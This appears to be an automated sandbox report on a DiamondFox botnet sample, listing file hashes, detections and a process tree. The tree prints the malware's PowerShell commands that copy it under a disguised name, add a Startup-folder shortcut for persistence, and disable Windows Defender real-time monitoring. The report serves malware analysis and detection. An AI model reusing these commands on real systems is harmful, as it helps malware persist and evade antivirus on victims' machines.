Analysis
-
max time kernel
92s -
max time network
97s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
06/04/2021, 13:45
Static task
static1
Behavioral task
behavioral1
Sample
b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe
Resource
win10v20201028
General
-
Target
b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe
-
Size
190KB
-
MD5
2bc219ed6654653e817a2960ac924a7e
-
SHA1
c547d9c8ea50473b72c0b85672cf32ca5e9558b8
-
SHA256
b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4
-
SHA512
6edebb8ed8bae2f50b64f903b52f82385daca9a9f1b2e87b57deabe3e8da593f9aed1903c86fe8fc443e86f7645428f89a38e78e9e1d26da6d8af05594ed2752
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 2 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral1/memory/1036-7-0x0000000000020000-0x0000000000038000-memory.dmp diamondfox behavioral1/memory/1036-8-0x0000000000400000-0x000000000041A000-memory.dmp diamondfox -
Executes dropped EXE 1 IoCs
pid Process 1620 SearchIndexer.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SearchIndexer.lnk powershell.exe -
Loads dropped DLL 3 IoCs
pid Process 1784 powershell.exe 1784 powershell.exe 1952 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1784 powershell.exe 1784 powershell.exe 1952 powershell.exe 1952 powershell.exe 2024 Powershell.exe 2024 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 2024 Powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1036 b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe 1620 SearchIndexer.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1036 wrote to memory of 1784 1036 b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe 29 PID 1036 wrote to memory of 1784 1036 b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe 29 PID 1036 wrote to memory of 1784 1036 b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe 29 PID 1036 wrote to memory of 1784 1036 b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe 29 PID 1784 wrote to memory of 1620 1784 powershell.exe 31 PID 1784 wrote to memory of 1620 1784 powershell.exe 31 PID 1784 wrote to memory of 1620 1784 powershell.exe 31 PID 1784 wrote to memory of 1620 1784 powershell.exe 31 PID 1620 wrote to memory of 1952 1620 SearchIndexer.exe 32 PID 1620 wrote to memory of 1952 1620 SearchIndexer.exe 32 PID 1620 wrote to memory of 1952 1620 SearchIndexer.exe 32 PID 1620 wrote to memory of 1952 1620 SearchIndexer.exe 32 PID 1620 wrote to memory of 2024 1620 SearchIndexer.exe 35 PID 1620 wrote to memory of 2024 1620 SearchIndexer.exe 35 PID 1620 wrote to memory of 2024 1620 SearchIndexer.exe 35 PID 1620 wrote to memory of 2024 1620 SearchIndexer.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe"C:\Users\Admin\AppData\Local\Temp\b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Copy-Item -Path 'C:\Users\Admin\AppData\Local\Temp\b526619f97cfcfb709fb1684d01e82b6511bb9e2eab52570f39b7498dccbedf4.bin.exe' -Destination 'C:\Users\Admin\AppData\Local\InSecharex\SearchIndexer.exe';Start-Sleep -s 60;Start-Process 'C:\Users\Admin\AppData\Local\InSecharex\SearchIndexer.exe'2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\InSecharex\SearchIndexer.exe"C:\Users\Admin\AppData\Local\InSecharex\SearchIndexer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $shell = New-Object -ComObject WScript.Shell;$shortcut = $shell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SearchIndexer.lnk');$shortcut.TargetPath = 'C:\Users\Admin\AppData\Local\InSecharex\SearchIndexer.exe';$shortcut.Save()4⤵
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell Set-MpPreference -DisableRealtimeMonitoring 14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
-